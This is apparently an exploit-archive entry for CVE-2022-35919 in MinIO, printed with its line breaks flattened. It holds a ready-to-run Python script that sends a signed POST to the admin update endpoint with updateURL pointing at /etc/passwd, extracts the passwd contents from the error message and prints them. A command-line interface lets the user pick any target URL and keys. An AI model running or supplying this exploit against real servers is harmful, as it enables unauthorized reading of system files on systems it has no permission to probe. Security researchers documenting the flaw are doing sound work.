Minio 2022-07-29T19-40-48Z Path Traversal

# Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal# Date: 2023-09-02# Exploit Author: Jenson Zhao# Vendor Homepage: https://min.io/# Software Link: https://github.com/minio/minio/# Version: Up to (excluding) 2022-07-29T19-40-48Z# Tested on: Windows 10# CVE : CVE-2022-35919# Required before execution: pip install minio,requestsimport urllib.parseimport requests, json, re, datetime, argparsefrom minio.credentials import Credentialsfrom minio.signer import sign_v4_s3class MyMinio():    secure = False    def __init__(self, base_url, access_key, secret_key):        self.credits = Credentials(            access_key=access_key,            secret_key=secret_key        )        if base_url.startswith('http://') and base_url.endswith('/'):            self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'        elif base_url.startswith('https://') and base_url.endswith('/'):            self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'            self.secure = True        else:            print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n')    def poc(self):        datetimes = datetime.datetime.utcnow()        datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')        urls = urllib.parse.urlparse(self.url)        headers = {            'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',            'X-Amz-Date': datetime_str,            'Host': urls.netloc,        }        headers = sign_v4_s3(            method='POST',            url=urls,            region='',            headers=headers,            credentials=self.credits,            content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',            date=datetimes,        )        if self.secure:            response = requests.post(url=self.url, headers=headers, verify=False)        else:            response = requests.post(url=self.url, headers=headers)        try:            message = json.loads(response.text)['Message']            pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)'            matches = re.findall(pattern, message)            if matches:                print('There is CVE-2022-35919 problem with the url!')                print('The contents of the /etc/passwd file are as follows:')                for match in matches:                    print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5],                                                        match[6]))            else:                print('There is no CVE-2022-35919 problem with the url!')                print('Here is the response message content:')                print(message)        except Exception as e:            print(                'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:')            print(response.text)if __name__ == '__main__':    parser = argparse.ArgumentParser()    parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/")    parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")    parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")    args = parser.parse_args()    minio = MyMinio(args.url, args.accesskey, args.secretkey)    minio.poc()